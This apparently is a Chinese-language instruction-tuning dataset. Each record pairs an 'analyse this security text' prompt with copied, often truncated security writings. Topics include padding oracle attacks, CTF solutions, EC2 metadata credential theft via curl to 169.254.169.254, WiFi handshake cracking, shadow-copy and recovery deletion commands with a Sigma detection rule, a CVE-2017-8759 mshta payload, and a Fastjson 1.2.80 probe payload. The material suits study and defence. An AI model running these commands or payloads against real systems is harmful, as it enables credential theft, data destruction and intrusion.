{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Padding Oracle Attack介绍 Padding Oracle Attack 攻击一般需要满足以下几个条件 - 加密算法 - 采用 PKCS5 Padding 的加密算法 当然非对称加密中 OAEP 的填充方式也有可能会受到影响 - 分组模式为 CBC 模式 - 攻击者能力 - 攻击者可以拦截上述加密算法加密的消息 - 攻击者可以和 padding oracle即服务器 进行交互客户端向服务器端发送密文服务器端会以某种返回信息告知客户端 padding 是否正常 Padding Oracle Attack 攻击可以达到的效果如下 - 在不清楚 key 和 IV 的前提下解密任意给定的密文 ### Padding Oracle Attack原理 Padding Oracle Attack 攻击的基本原理如下 - 对于很长的消息一块一块解密 - 对于每一块消息先解密消息的最后一个字节然后解密倒数第二个字节依次类推 这里我们回顾一下 CBC 的 - 加密 $$ C_i=E_K(P_i \\oplus C_{i-1})\\\\ C_0=IV $$ - 解密 $$ P_{i}=D_{K}(C_{i})\\oplus C_{i-1}\\\\ C_{0}=IV $$ 我们主要关注于解密这里我们并不知道 IV 和 key这里我们假设密文块的长度为 n 个字节 假设我们截获了密文最后两个密文块 $F$ 与 $Y$ 以获取密文块 $Y$ 的对应明文的最后一个字节为例子进行分析为了获取 $Y$ 解密后的内容我们首先需要伪造一块密文块 $F'$ 以便于可以修改 $Y$ 对应解密明文的最后一个字节这是因为若我们构造密文 `F'|Y` 那么解密 $Y$ 时具体为 $P'=D_K(Y)\\oplus F'$ 所以修改密文块 $F'$ 的最后一个字节 $F'_{n}$ 可以修改 Y 对应解密明文 $P'$ 的最后一个字节 $P'_n$ 进而反推出原先的明文 $P$ 的最后一个字节下面给出获取 $P$ 最后一个字节的过程 1. `i=0`设置 $F'$ 的每个字节为**随机字节** 2. 设置 $F'_n=i \\oplus 0x01$  3. 将 `F'|Y` 发送给服务器如果服务器端没有报错那有很大概率 $P'$ 的最后一个字节是 0x01否则只有 $P'$ 的最后 $P'_n \\oplus i \\oplus 0x01$ 字节都是 $P'_n \\oplus i \\oplus 0x01$ 才不会报错**而且需要注意的是 padding 的字节只能是 1 到 n** 因此若想要使得在 F' 随机地情况下并且满足 padding 字节大小的约束情况下还不报错**概率很小**所以在服务器端不报错的情况下我们可以认为我们确实获取了正确的字节这时可知 $D_k(Y)$ 的最后一个字节 $D_k(Y)_n$ 为 $P'_n \\oplus F'_n = 0x01 \\oplus i \\oplus 0x01 = i$ 即可知道原先的明文 $P$ 的最后一个字节 $P_n = D_k(Y)_n \\oplus F_n = i \\oplus F_n$  4. 在出现错误的情况下`i=i+1`跳转到 2. 当获取了 $P$ 的最后一个字节后我们可以继续获取 $P$ 的倒数第二个字节此时需要设置 $F'_n=D_k(Y)_n\\oplus 0x02$ 同时设置 $F_{n-1}=i \\oplus 0x02$ 去枚举 `i`以此类推我们可以获取 Y 所对应的明文 $P$ 的所有字节 所以综上所示Padding Oracle Attack 其实在一定程度上是一种具有很大概率成功的攻击方法 然而需要注意的是往往遇到的一些现实问题并不是标准的 Padding Oracle Attack 模式我们往往需要进行一些变形", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SECCON 2017 Quals Team: c7f.m0d3, cr019283, akrasuski1, nazywam, shalom, rev ### Table of contents * [SqlSRF (web)](web_sqlsrf) * [Ps and Qs (crypto)](crypto_ps_and_qs) * [Vigenere 3d(crypto)](crypto_vigenere) * [Simon and Speck Block Ciphers (crypto)](crypto_simon) * [JPEG File (misc)](misc_jpeg) * [Very smooth (crypto)](crypto_smooth) * [Automatic door (web)](web_automatic)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInsecure.Org Insecure.Org Nmap: Scanning the Internet by Fyodor Black Hat Briefings USA  August 6, 2008; 10AM Defcon 16  August 8, 2008; 4PM Insecure.Org Insecure.Org Abstract The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning millions of Internet hosts as part of the Worldscan project. He will present the most interesting findings and empirical statistics from these scans, along with practical advice for improving your own scan performance. Additional topics include detecting and subverting firewall and intrusion detection systems, dealing with quirky network configurations, and advanced host discovery and port scanning techniques. A quick overview of new Nmap features will also be provided. Insecure.Org Insecure.Org Old Slide Disclaimer These slides were due in June, when I was still running scans and at least a month away from finishing analasys. So while the topic isn't changing, the final slides will differ materially from these. These slides are from the inaugural Black Hat Webcast with Jeff Moss on June 26, 2008. The webcast gives a good overview of the talk and describes some valuable early results of the scanning. The video is scheduled to be posted at http://blackhat.com in early July. Insecure.Org Insecure.Org Planning the Big Scan  Determining IP addresses to scan  P2P Scanning?  Legal Issues  Firewalls  Performance Insecure.Org Insecure.Org Scan Results  Scans are still running  Some tentative results already available, and can improve scan performance. Insecure.Org Insecure.Org Best TCP Ports for Host Discovery  Echo request, and even Nmap default discovery scans are insufficient for Internet scanning.  Adding more TCP SYN and ACK probes can help, but which ports work the best? Insecure.Org Insecure.Org Top 10 TCP Host Discovery Port Table  80/http  25/smtp  22/ssh  443/https  21/ftp  113/auth  23/telnet  53/domain  554/rtsp  3389/ms-term-server Insecure.Org Insecur", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: EC2 所面临的风险 --- <center><h1>EC2 所面临的风险</h1></center> --- ## 1凭证泄露 云场景下的凭证泄露可以分成以下几种 - 控制台账号密码泄露例如登录控制台的账号密码 - 临时凭证泄露 - 访问密钥泄露即 AccessKeyIdSecretAccessKey 泄露 - 实例登录凭证泄露例如 AWS 在创建 EC2 生成的证书文件遭到泄露 对于这类凭证信息的收集一般可以通过以下几种方法进行收集 - Github 敏感信息搜索 - 反编译目标 APK小程序 - 目标网站源代码泄露 ## 2元数据 元数据服务是一种提供查询运行中的实例内元数据的服务当实例向元数据服务发起请求时该请求不会通过网络传输如果获得了目标 EC2 权限或者目标 EC2 存在 SSRF 漏洞就可以获得到实例的元数据 在云场景下可以通过元数据进行临时凭证和其他信息的收集在 AWS 下的元数据地址为http://169.254.169.254/latest/meta-data/直接 curl 请求该地址即可 通过元数据攻击者除了可以获得 EC2 上的一些属性信息之外有时还可以获得与该实例绑定角色的临时凭证并通过该临时凭证获得云服务器的控制台权限进而横向到其他机器 通过访问元数据的 `/iam/security-credentials/<rolename>` 路径可以获得目标的临时凭证进而接管目标服务器控制台账号权限前提是目标需要配置 IAM 角色才行不然访问会 404 ```shell curl http://169.254.169.254/latest/meta-data/iam/security-credentials ``` <img width=\"900\" src=\"/img/1649996601.png\"> 通过元数据获得目标的临时凭证后就可以接管目标账号权限了这里介绍一些对于 RT 而言价值相对较高的元数据 ``` mac 实例 MAC 地址 hostname 实例主机名 iam/info 获取角色名称 local-ipv4 实例本地 IP public-ipv4 实例公网 IP instance-id 实例 ID public-hostname 接口的公有 DNS (IPv4) placement/region 实例的 AWS 区域 public-keys/0/openssh-key 公有密钥 /iam/security-credentials/<rolename> 获取角色的临时凭证 ``` ## 3账号劫持 如果云厂商的控制台存在漏洞的话用户账号也会存在一定的风险 例如 AWS 的控制台曾经出现过一些 XSS 漏洞攻击者就可能会使用这些 XSS 漏洞进行账号劫持从而获得目标云服务器实例的权限 ## 4恶意的镜像 AWS 在创建实例的时候用户可以选择使用公共镜像或者自定义镜像如果这些镜像中有恶意的镜像那么目标使用该镜像创建实例就会产生风险 以 CVE-2018-15869 为例关于该漏洞的解释是当人们通过 AWS 命令行使用ec2 describe-images功能时如果没有指定 --owners 参数可能会在无意中加载恶意的 Amazon 系统镜像 ( AMI导致 EC2 被用来挖矿 对此在使用 AWS 命令行时应该确保自己使用的是不是最新版的 AWS 命令行同时确保从可信的来源去获取 Amazon 系统镜像 ## 5其他的初始访问方法 除了以上云场景下的方法外还可以通过云服务上的应用程序漏洞SSH 与 RDP 的弱密码等传统场景下的方法进入目标实例 > 参考资料 > > https://cloud.tencent.com/developer/article/1931560 > > https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/ > > https://docs.aws.amazon.com/zh_cn/AWSEC2/latest/UserGuide/instancedata-data-categories.html <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年4月15日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# coding: utf-8 import hashlib import string class SymbolicXor: def __init__(self, ops, const=0): if isinstance(ops, str): ops = [ops] self.ops = sorted(ops) self.const = const def __xor__(self, other): if isinstance(other, int): return SymbolicXor(self.ops, self.const  other) elif isinstance(other, SymbolicXor): return SymbolicXor(self.setxor(self.ops, other.ops), self.const  other.const) __rxor__ = __xor__ def setxor(self, a, b): out = list(a) for el in b: if el in out: out.remove(el) else: out.append(el) return out def __str__(self): if self.const == 0 and not self.ops: return '0' return ''.join(str(c) for c in self.ops + ([self.const] if self.const else [])) __repr__ = __str__ def __eq__(self, oth): return self.ops == oth.ops and self.const == oth.const def chunks(d, n): return [d[i*n:(i+1)*n] for i in range(len(d)/n)] def xor(a, b): return ''.join(chr(ord(ac)  ord(bc)) for ac, bc in zip(a, b)) data0 = \"\"\" F1 64 72 4A 4F 48 4D BA 77 73 1D 34 F5 AF B8 0F 24 56 11 65 47 A3 2F 73 A4 56 4F 70 4A 13 57 9C 3F 6F 06 61 40 90 AF 39 10 29 34 C3 00 7A 40 3D 4E 3F 0E 2A 2F 20 7F 73 89 7D 4B 1D 09 AA D0 00 21 89 4D 2A 67 7C 18 3B 39 F2 8D 1C A7 71 57 2E 31 14 67 48 3C 7D AF 70 AE 10 31 68 D1 26 05 C8 25 F2 62 F5 5D 38 34 F2 20 0E 7E 9F FB 57 72 26 57 67 15 10 15 13 B9 3E 79 89 5D 24 12 01 98 7B 18 25 E0 DF 7C 24 1B 2D 44 B0 10 3D 57 3D 62 B4 21 1D 3E D1 10 D7 45 74 96 2B 6D 3B ED 10 00 67 31 DF 6C B8 86 1A 7C 6B 64 78 C6 37 76 E6 61 A0 AD BE 4C BA A7 0D \"\"\".replace('\\n', '').replace(' ', '').decode('hex') data1 = \"\"\" 08 4F FE AB 4E AA B4 03 4D 99 6E A1 48 D0 7D A2 E0 49 38 61 2D BC 5E 2C 5D 62 3F 89 C6 B8 5C 5A 4B 13 41 07 DF BF C2 29 07 64 14 25 32 00 73 69 2D 58 4B 76 15 29 2F A1 00 00 00 00 00 00 00 00 \"\"\".replace('\\n', '').replace(' ', '').decode('hex') def encrypt_chunks(data, passw, k, sd, s0, st): \"\"\" encrypt chunks with size k start with [s0 bytes from front] [k-s0 bytes from back] start with s=s0 after every round add sd to s when s == st, change s to s0 again \"\"\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### WIFI相关标准介绍 > `802.11` 是现今无线局域网通用的标准,常见认证方式 > > - 不启用安全 > - `WEP` > - `WPA/WPA2-PSK`预共享密钥 > - `PA/WPA2 802.1X` `radius` 认证 ### WPA-PSK建立过程描述 其中四次握手过程 1. 4次握手开始于验证器(AP)它产生一个随机的值(ANonce)发送给请求者 2. 请求者也产生了它自己的随机SNonce然后用这两个Nonces以及PMK生成了PTK请求者回复消息2给验证器,还有一个MICmessage integrity code消息验证码作为PMK的验证 3. 它先要验证请求者在消息2中发来的MIC等信息验证成功后如果需要就生成GTK然后发送消息3 4. 请求者收到消息3验证MIC安装密钥发送消息4一个确认信息验证器收到消息4验证MIC安装相同的密钥 ### WIFI相关例题 > 实验吧 `shipin.cap` 从大量的`Deauth` 攻击基本可以判断是一个破解 `wifi` 时的流量攻击 同时也成功发现了握手包信息 接下来跑密码 - `linux`  `aircrack` 套件 - `windows`  `wifipr` 速度比 `esaw` 快 `GTX850` 能将近 `10w\\s :`) 得到密码`88888888`在 `wireshark` 中`Edit -> Preferences -> Protocols -> IEEE802.11 -> Edit`以`key:SSID`形式填入即可解密 `wifi` 包看到明文流量 > KCARCK相关: https://www.krackattacks.com/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1490-win-禁止系统恢复 ## 来自ATT&CK的描述 攻击者可能会删除操作系统的内置数据并关闭帮助已损坏系统恢复的服务操作系统可能包含可帮助修复损坏系统的功能例如备份目录卷影副本和自动修复功能攻击者可以禁用或删除这些系统恢复功能以增强销毁数据和加密数据的影响 攻击者可以使用许多本机Windows实用程序来禁用或删除系统恢复功能 - vssadmin.exe 可用于删除系统上的所有卷影副本 - vssadmin.exe delete shadows /all /quiet - Windows Management Instrumentation可用于删除卷影副本 - wmic shadowcopy delete - wbadmin.exe 可用于删除Windows备份目录 - wbadmin.exe delete catalog -quiet - bcdedit.exe 可用于通过修改启动配置数据来禁用Windows自动恢复功能 - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no ## 测试案例 wmic shadowcopy delete ## 检测日志 windows 安全日志 ## 测试复现 ```bash C:\\Users\\Administrator>wmic shadowcopy delete 没有可用实例 ``` ## 测试留痕 4688 Windows安全日志进程创建 ```yml 已创建新进程 创建者主题: 安全 ID: QAX\\Administrator 帐户名: Administrator 帐户域: QAX 登录 ID: 0x7169C 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x1304 新进程名称: C:\\Windows\\System32\\wbem\\WMIC.exe 令牌提升类型: %%1936 强制性标签: Mandatory Label\\High Mandatory Level 创建者进程 ID: 0x15d0 创建者进程名称: C:\\Windows\\System32\\cmd.exe 进程命令行: wmic shadowcopy delete ``` ## 检测规则/思路 ### sigma规则 ```yml title: windows下删除系统恢复功能 description: Windows下使用wmic shadowcopy delete删除卷影副本 tags: T1490 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection1: EventID: 4688 #进程创建 New Processname: 'bcdedit.exe' #进程信息>新进程名称 Processcommandline: - '* set * bootstatuspolicy ignoreallfailures' #进程信息>进程命令行 - '* set * recoveryenabled no' #进程信息>进程命令行 selection2: EventID: 4688 #进程创建 New Processname: 'vssadmin.exe' #进程信息>新进程名称 Processcommandline|contain: 'delete shadows' #进程信息>进程命令行 selection3: EventID: 4688 #进程创建 New Processname: 'wmic.exe' #进程信息>新进程名称 Processcommandline: 'shadowcopy delete' #进程信息>进程命令行 condition: 1 of selection* level: high ``` ## 建议 使用进程监视来检测涉及禁止系统恢复的二进制文件的执行和命令行参数例如vssadminwbadmin和bcdeditWindows事件日志例如提示系统目录已删除的事件ID524可能包含与可疑活动相关的事件 ## 参考推荐 MITRE-ATT&CK-T1490 <https://attack.mitre.org/techniques/T1490/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Attacking Autonomic Networks 2 Agenda o o o o 3 Autonomic Systems o o 4 Autonomic Network o o o o credits 5 Live Demo 6 Demo Results o o o 7 Cisco Deployment o o o o 8 Channel Discovery o o 9 Adjacency Discovery o o o o o 10 Adjacency Discovery I support network/domain X I am part of domain <domain name> Registrar Enrollee Registrar domain certificate Generate 3072- RSA key Send public key Enrollee domain certificate 11 Secure Channel o o o o o o o 12 Registrar Configuration autonomic registrar domain-id ERNW.de whitelist flash:whitelist.txt CA local no shut autonomic 13 Enrollee Configuration o o o o autonomic 14 Autonomic Effect o o o o o o o 15 Are you in Control? 16 Autonomic Network: Under The Hood 17 Channel Discovery 18 Channel Discovery 19 Channel Discovery 20 Channel Discovery 21 Channel Discovery 22 Channel Discovery 23 Channel Discovery 24 Channel Discovery 25 Adjacency Discovery 26 Adjacency Discovery 27 Adjacency Discovery 28 Adjacency Discovery 29 Adjacency Discovery 30 Adjacency Discovery 31 Adjacency Discovery 32 Adjacency Discovery 33 Adjacency Discovery 34 Adjacency Discovery 35 Adjacency Discovery 36 Adjacency Discovery 37 Adjacency Discovery 38 Adjacency Discovery 39 Secure Channel o o o  40 41 Is it Secure? 42 Live Chat Support 43 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! 44 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: . 45 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Thanks for reporting, we created BugID CSCvd15717. We will check with the BU for that 46 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel! Support: Hi, the BU responded that as both have a certificate signed by same CA, then they can connect. 47 Live Chat Support Me: Hi, I connected 2 nodes from 2 different domains and they ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n重装上阵Office攻击来袭 朱季峰 杨军锋 议程:  一 2017年年Office威胁分析与回顾  二 如何建立终端Office威胁防护机制  三 2017年年Office ITW 0day原因分析  四 关于2018年年Office威胁趋势的预测 2017年年Office威胁分析与回顾  Case study 1定向攻击中使用Office作为攻击武器器  样本首现时间2016-12-26  攻击跨度时间2016-12-27  2017-02  事件背景北北约-俄罗斯理理事会举行行年年内第三次大使级会议2016-12-19日  攻击事件信息披露露Matryoshka Doll Reconnaissance Frameworkby Cisco/Talos Research Team  2017-01-27 2017年年Office威胁分析与回顾  Case study 1定向攻击中使用Office作为攻击武器器 2017年年Office威胁分析与回顾  Case study 1定向攻击中使用Office作为攻击武器器  RTFArchives->  OLE Stream 0 ->  Documents ->  Objects(Shockwave.Flash)  RootEntry  \\3Objectinfo  \\3OCXNAME  \\Contents 2017年年Office威胁分析与回顾  Case study 1定向攻击中使用Office作为攻击武器器  RTFArchives->    \\Contents  1 2 3 3 2017年年Office威胁分析与回顾  Case study 1定向攻击中使用Office作为攻击武器器  RTF\\Contents  Init() 4 Onload() 5 expLoaded() PayLoaded() 6 7 根据目标系统 下载对应的漏洞 利用代码否则 退出 真实攻击代 码与前期信 息采集分离 2017年年Office威胁分析与回顾  Case study 2CVE-2017-0199/CVE-2017-8570  样本首现时间2017-04-07前  攻击跨度时间2017-04-07  至今  事件背景1 逻辑漏漏洞洞2 CVE-2017-0199包含2个漏漏洞洞3 2017 Pwnie Awards for best client-side bugs  攻击事件信息披露露Critical Office Zero-Day Attacks Detected in the Wild by McAfee Labs,2017-04-07 2017年年Office威胁分析与回顾  Case study 2CVE-2017-0199CVE-2017-8570  RTFArchives->  OLE Stream 0 ->  Documents ->  Object URL Moniker Svchost.exe Mshta.exe Malicious script 1 2 1 3 4 2017年年Office威胁分析与回顾  Case study 3CVE-2017-8759-Microsoft .NET Framework 漏漏洞洞  样本首现时间~2017-09-12  攻击跨度时间2017-09-12  至今  攻击事件信息披露露 FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY by FireEye/Threat Research,2017-09-12ƒß 2017年年Office威胁分析与回顾  Case study 3CVE-2017-8759-Microsoft .NET Framework 漏漏洞洞  RTFArchives->  OLE Stream 0 ->  Documents ->  Object(soap moniker) .net SOAP WSDL parser <soap:address location=\" http://127.0.0.1:8080?C:\\Windows\\System32\\mshta.exe?http://127.0.0.1:8080/c md.hta\"/> <soap:address location=\"; if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null ) { System.Diagnostics.Process.Start(_url.Spl it('?')[1], _url.Split('?')[2]); System.AppDom", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# New Caesar Category: Crypto, 60 points ## Description > We found a brand new type of encryption, can you break the secret code? (Wrap with picoCTF{}) > > `kjlijdliljhdjdhfkfkhhjkkhhkihlhnhghekfhmhjhkhfhekfkkkjkghghjhlhghmhhhfkikfkfhm` A Python file was attached: ```python import string LOWERCASE_OFFSET = ord(\"a\") ALPHABET = string.ascii_lowercase[:16] def b16_encode(plain): enc = \"\" for c in plain: binary = \"{0:08b}\".format(ord(c)) enc += ALPHABET[int(binary[:4], 2)] enc += ALPHABET[int(binary[4:], 2)] return enc def shift(c, k): t1 = ord(c) - LOWERCASE_OFFSET t2 = ord(k) - LOWERCASE_OFFSET return ALPHABET[(t1 + t2) % len(ALPHABET)] flag = \"redacted\" key = \"redacted\" assert all([k in ALPHABET for k in key]) assert len(key) == 1 b16 = b16_encode(flag) enc = \"\" for i, c in enumerate(b16): enc += shift(c, key[i % len(key)]) print(enc) ``` ## Solution This encryption scheme first encodes the plaintext as `base16` (which essentially encodes each nibble of the plaintext as a character) and then applies a shift cipher to it. So, in order to reverse the operation, let's start by implementing the opposite operations: ```python import string LOWERCASE_OFFSET = ord(\"a\") ALPHABET = string.ascii_lowercase[:16] def b16_decode(enc): plain = \"\" for c1, c2 in zip(enc[0::2], enc[1::2]): n1 = \"{0:04b}\".format(ALPHABET.index(c1)) n2 = \"{0:04b}\".format(ALPHABET.index(c2)) binary = int(n1 + n2, 2) plain += chr(binary) return plain def unshift(c, k): t1 = ord(c) - LOWERCASE_OFFSET t2 = ord(k) - LOWERCASE_OFFSET return ALPHABET[(t1 - t2) % len(ALPHABET)] def decrypt(enc, key): dec = \"\" for i, c in enumerate(enc): dec += unshift(c, key[i % len(key)]) return dec ``` Now we can iterate all the possible keys (which are all the letters in the alphabet), try to decrypt the ciphertext and if the result is a legal base16 string, try to decrypt that as well. We'll ignore anything that doesn't result in a printable plaintext. ```python ciphertext = \"kjlijdliljhdjdhfkfkhhjkkhhkihlhnhghekfhmhjhkhfhe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON30 | 拯救环境变量 收录于合集 #红队 18个 通过在进程级别操纵环境变量可以让受信任的应程序加载任意 DLL 并执恶意代 码这篇章列出了近 100 个在 Windows 11 (21H2) 上易受此类 DLL 劫持的可执 件它演示了如何仅三 VBScript 就可以实现这点 环境变量 环境变量是在 1970 年代后期在 Unix V7 [ 1 , p.99-101 ] 中引的作为将信息传递给进程的 种简单法事实证明它很受欢迎年后它也被 PC DOS 2.0 [ 2 , p.477 ] 采最终演 变成 Windows 操作系统约四年后环境变量仍然存在于 Windows 中尽管其他发 展例如在 Windows 3.1 中引注册表已经在定程度上改变了它的 环境变量的概念很简单键值对的集合在进程启动时可供进程使并可作程序流的部 分顾名思义这些变量通常包含有关操作系统环境的信息例如如果将 HOMEDRIVE 具有 值 C: 的环境变量提供给进程它可能会使该信息来决定将件存储到 C: 驱动器不是 任何其他驱动器 开卷[益  不 2022-08-16 11:50 发表于新加坡 原创 bggsec 甲安全建设 显示环境变量在进程环境块 (PEB) 中的存储位置的图表 显示环境变量在进程环境块 (PEB) 中的存储位置的图表 Windows 中的每个进程都有个关联的进程环境块 (PEB)这是种包含进程可的各种信息 的数据结构 [ 3 ]如上图所示环境变量是该结构的部分所有变量键和值都存储在单个字 符串中总共可以包含多达 32,767 (2 15 -1) 个字符 [ 4 ] 关重要的是这意味着环境变量可以从进程更改为进程当个新进程启动时进程负责 提供环境变量这些将包含在新流程的 PEB 中在多数情况下级将简单地传递它 启动时收到的环境变量 这就引出了最进程从哪获取其环境变量的问题不同的级别上设置环境变量系统户 和进程 [ 5 ]在系统级别设置的环境变量适于所有户户级变量仅适于当前户两 者都存储在注册表中前者在HKLM下后者在HKCU下当 Windows 启动时它先获取 所有系统环境变量当户登录时它会添加并可能覆盖任何户环境变量例如 HOM EDRIVE 可能设置为 C: 系统级别但个别户可能已决定将其设置为 D: . 当在该户的上下 中启动个新进程时它将 HOMEDRIVE=D: 作为环境变量接收最后当在进程级别设置环 境变量时它会在单个进程中更改尽管它可以传递给所有新的进程但它不像系统和户 级别的环境变量那样持久 . 个很好的例是 set HOMEDRIVE=X: 在 Windows 命令提示符 中运从此提示启动的任何新进程都将 HOMEDRIVE=X: 作为环境变量接收但如果提示关闭 并重新打开该 HOMEDRIVE 变量将重置为其原始值 Windows 开箱即地定义了许多环境变量尽管可以覆盖这些值但这些值通常是在安装 Windows 时设置的并且永远不会更改包括系统组件在内的各种程序都依赖于这些变量 例如某些程序使 SYSTEMROOT 或更旧的 WINDIR 来获取 Windows 件夹的路径通 常是 C:\\Windows . 劫持机会 如前所述程序可能依赖这些标准环境变量来确定某些件的路径例如事实证明有相当 多的程序依赖 SYSTEMROOT 并 WINDIR 加载位于 C:\\Windows\\System32 件夹中的 DLL h ostname.exe 例如尝试在 %SYSTEMROOT%\\System32\\mswsock.dll 运时加载带有路径的 DLL在正常情况下这将解析为 C:\\Windows\\System32\\mswsock.dll . 因为这是条绝对 路径所以不会调 DLL 搜索顺序因此们可能会得出结论这不会为我们提供 DLL 劫持 机会 [ 6 ] 然由于涉及到个变量这仍然可以被利如果要更改 to 的值 SYSTEMROOT  C:\\Ev il 程序将尝试加载 C:\\Evil\\System32\\mswsock.dll 如果攻击者将恶意 DLL 放在该位 置则会导致合法 hostname.exe 的 DLL 被欺骗加载攻击者的 DLL因此这毕竟为我们提 供了种新型的 DLL Hijacking 可以说执这种技术说起来容易做起来难在系统或户级别更改值的个主要问题 SYSTE MROOT 是它实际上会破坏整个操作系统如此多的系统组件依赖于 SYSTEMROOT 许多程序如 果您将其指向个不包含它们所期望的 DLL 的录那么许多程序将法正常作这会导 致系统不稳定甚可能导致操作系统完全停作因此在多数情况下它先会破坏 执 DLL 劫持的的 但是正如我们所也可以仅在进程级别更改环境变量这意味着只有那个单的新进程将 具", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFastjson1.2.80漏洞复现 2022-09-01  Web安全 Fastjson于5月23日在commit 560782c与commit 097bff1中更新了security_update_20220523的修复方案调 整黑白名单的同时额外判断了 Exception 并在添加类缓存mappings前新增了 autoTypeSupport 的判断 显而易见 Exception 的派生类中出了叛徒不久后fastjson-blacklist更新了黑名单类名直到前几天漏洞作者i SafeBlue公开了思路与Gadgets本文是对浅蓝师傅议题中留下的一点小作业的复现记录 期望类与类缓存 不太了解的同学可以参考上一篇Fastjson-autoType漏洞总结1.2.80第一步依然是基于众所周知的期望类 机制将其它类加入类缓存关键在于怎么横向出 Exception 之外的其它类型 Fastjson反序列化恢复类实例时自然也需要恢复用到了的类属性如果这个属性是可利用的类且我们可控 是不是就能直接利用 或者进一步横向扩展出其它类间接利用上一篇我们说到了期望类不但可以由JSON显 式指定同样可以由类间关系隐式确定那么依靠属性名赋值时的隐式类间关系也就不再需要在JSON中显 式指定 @type 从而绕过了 autoType 的白名单检查 实例化类属性的对应类后fastjson会将其加入到类缓存mappings中从缓存中取类在修复前不会判断 autoTypeSupport 所以绕过了类白名单机制扩展出更多的可用类 利用流程 1. 指定显式期望类实例化 XXXException 并被加入类缓存 2. 通过 XXXException 中可控的属性名/参数名由隐式类间关系实例化并被加入类缓存 3. 直接从缓存中拿出来用或者进一步递归让其它类被加入到缓存 第二步的重点在于既然不能显示指定期望类就只能依靠 deserializer 去自动处理我们需要构造出让它 解析时进到特定 deserializer 分支的特定格式对此我提供一个 aspectj 读文件的具体实现便于师傅们理 解复现更多Gadgets浅蓝师傅在Slides中写得很清楚了可以自行构造 https://github.com/hosch3n/FastjsonVulns 两点小坑 再提醒两点小坑一是如果DNSLog是用p师傅的CoNote存在下划线时是不会被记录到的这个问题让我自 闭了一阵 二是目前测试来看只有MacOS可以ping带花括号的域名Linux和Windows会报错所以这个探测链的Poc需要 要合适的报错环境才能看到结果 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 { \"@type\":\"java.net.Inet4Address\", \"val\":{ \"@type\":\"java.lang.String\"{ \"@type\":\"java.util.Locale\", \"val\":{ \"@type\":\"com.alibaba.fastjson.JSONObject\",{ \"@type\":\"java.lang.String\" \"@type\":\"java.util.Locale\", \"country\":\"g.token.dnslog.pw\", \"language\":{ \"@type\":\"java.lang.String\"{ \"x\":{ \"@type\":\"java.lang.Class\", \"val\":\"org.python.antlr.ParseException\" } } } } } Code", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nICS 35.020 CCS YD 中 华 人 民 共 和 国 通 信 行 业 标 准 YD/T 1756T2018 [代替 YD/T] 研发运营一体化DevOps能力成熟度 模型 第 4 部分技术运营 The Capability Maturity Model of DevOps Part 4 : Technical Operation management 送审稿 本稿完成日期2019.6.20 []-[]-[]发布 []-[]-[]实施 中华人民共和国工业和信息化部! 发 布 YD/T 1756T2018 I 目 次 目 次 ............................................................................................................................................................ I 前 言 .......................................................................................................................................................... III 研发运营一体化DevOps能力成熟度模型 第 4 部分技术运营 ........................................................... 1 1 范围 ................................................................................................................................................................ 1 2 规范性引用文件 ............................................................................................................................................ 1 3 术语和定义及缩略语 .................................................................................................................................... 1 3.1 术语和定义 ............................................................................................................................................. 1 3.1.1 配置项 configuration item ................................................................................................................ 1 3.1.2 制品 artifact ...................................................................................................................................... 1 3.1.3 代码复杂度 code complexity ........................................................................................................... 1 3.1.4 部署流水线 deployment pipeline .................................................................................................... 1 3.1.5 研发运营一体化 DevOps ....................................................................................................", "category": "text_analysis", "source": "security_papers"}
